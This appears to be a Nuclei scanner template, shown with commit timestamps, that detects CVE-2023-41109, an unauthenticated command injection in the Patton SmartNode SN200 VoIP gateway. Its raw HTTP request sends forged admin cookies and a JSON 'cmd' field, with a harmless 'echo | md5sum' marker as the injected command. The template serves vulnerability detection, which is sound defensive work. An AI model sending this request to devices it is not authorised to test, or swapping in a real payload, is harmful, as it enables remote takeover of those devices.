2023-12-29 05:52:26 +00:00
|
|
|
id: CVE-2023-41109
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection
|
|
|
|
author: princechaddha
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.
|
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
|
|
|
|
remediation: |
|
|
|
|
Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
|
2024-01-14 13:49:27 +00:00
|
|
|
reference: |-
|
2023-12-29 05:52:26 +00:00
|
|
|
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-41109
|
2024-01-14 13:49:27 +00:00
|
|
|
- http://packetstormsecurity.com/files/175945/SmartNode-SN200-3.21.2-23021-OS-Command-Injection.html
|
|
|
|
- http://seclists.org/fulldisclosure/2023/Nov/12
|
|
|
|
- https://www.syss.de/
|
2023-12-29 14:17:37 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2023-41109
|
|
|
|
cwe-id: CWE-78
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.33157
|
|
|
|
epss-percentile: 0.97044
|
|
|
|
cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:*
|
2023-12-29 14:17:37 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
|
|
|
vendor: patton
|
2024-05-31 19:23:20 +00:00
|
|
|
product: smartnode_sn200
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve,cve2023,smartnode,voip,patton
|
2023-12-29 05:52:26 +00:00
|
|
|
variables:
|
|
|
|
payload: "echo CVE-2023-41109 | md5sum"
|
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1
|
2023-12-29 08:50:24 +00:00
|
|
|
Host: {{Hostname}}
|
2023-12-29 05:52:26 +00:00
|
|
|
Cookie: AuthToken=; AuthGroup=superuser; UserName=admin
|
|
|
|
|
|
|
|
{"cmd":"{{payload}}","arguments":[]}
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-12-29 14:17:37 +00:00
|
|
|
part: body
|
2023-12-29 05:52:26 +00:00
|
|
|
words:
|
|
|
|
- "dd556350275e2ee0a2e877cea9c8a74a"
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4b0a00483046022100957697fedc1e8c0e72418b4a7ff9772edd859418f1b322713e3e6054d20c362d022100ecc7504e92125a1f7a4a4e533b58833d07d6e312f31036b0938734535c480fbe:922c64590222798bb761d5b6d8e72950
|